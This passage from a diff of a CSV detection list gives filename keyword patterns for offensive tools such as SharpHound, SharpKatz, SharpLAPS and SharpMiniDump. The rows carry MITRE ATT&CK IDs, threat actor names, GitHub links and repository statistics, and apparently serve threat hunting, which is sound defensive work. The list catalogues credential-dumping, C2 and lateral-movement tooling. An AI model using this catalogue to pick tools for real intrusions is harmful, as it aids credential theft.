T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" -"*SharpHound.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*SharpHound.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpHound.exe*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*SharpHound.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*SharpHound.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpHound.exe*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*SharpHound.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" "*SharpHound.ps1*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" -"*SharpHound.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*SharpHound.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*SharpHound.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*SharpHound.ps1*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*SharpHound.ps1*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*SharpHound.ps1*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" -"*SharpHound2*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*SharpHound2*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*Sharphound2.*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" -"*SharpHound3*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*SharpHound3*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*Sharphound-Aggressor*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" -"*SharpHoundCommon.*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"*SharpHoundCommonLib*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*SharpHoundCommon.*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*SharpHoundCommonLib*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*sharpinline *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Sharpkatz*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpKatz.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpKatz.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpKatz.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*SharpkatzManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpLAPS.*","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","338","68","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" -"*SharpLAPS.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpLAPS.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpLAPS-main*","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","338","68","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" "*SharpLDAP.csproj*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" "*SharpLDAP.exe*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" "*SharpLDAP.sln*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" "*SharpLDAP-main*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" "*SharpLdapRelayScan*","offensive_tool_keyword","SharpLdapRelayScan","SharLdapRealyScan is a tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authenticationvand it's a C# port of?LdapRelayScan","T1557.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/klezVirus/SharpLdapRelayScan","1","1","N/A","7","1","72","16","2022-02-26T22:03:11Z","2022-02-12T08:16:59Z" -"*SharpLdapRelayScan*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*SharpMapExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpLdapRelayScan*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*SharpMapExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpMiniDump*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpMiniDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpMiniDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpMiniDumpManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpMove.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpNamedPipePTH.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpMove.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpNamedPipePTH.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 